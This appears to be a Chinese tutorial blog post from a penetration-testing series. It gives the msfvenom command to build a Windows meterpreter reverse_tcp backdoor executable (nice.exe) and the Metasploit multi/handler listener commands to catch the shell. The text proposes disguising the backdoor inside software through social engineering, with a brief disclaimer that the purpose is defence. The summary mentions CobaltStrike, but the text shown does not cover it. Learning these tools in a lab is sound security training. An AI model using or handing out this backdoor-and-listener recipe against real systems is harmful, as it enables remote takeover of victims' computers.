网络安全学习——渗透测试基础(四)

本文介绍了MSF(MetasploitFramework)如何生成Windows恶意软件后门,以及CobaltStrike这款渗透测试工具的使用方法,包括其功能如payload生成、C/S架构的服务器管理和客户端操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

                                                    MSF恶意程序利用+CS上线

PC端恶意程序利用

后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为
思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell
制作Windows恶意软件获取shell

msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。
实验内容:
制作Windows恶意软件获取shell
msfvenom的shell在windows中的使用 msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.39LPORT=6060 -f exe > nice.exe

-p 添加载荷payload。
-f 输出文件格式

启动metaspliot  msfconsole

metasploit设置侦听
msf > use exploit/multi/handler
#加载模块
msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
#设置payload
msf exploit(multi/handler) > set lhost kali的ip
#设置kali的IP
msf exploit(multi/handler) > set lport 6060
#设置kali的端口lport =6060
msf exploit (multi/handler) > exploit 或者 run -j
#执行

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星光网络安全社

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值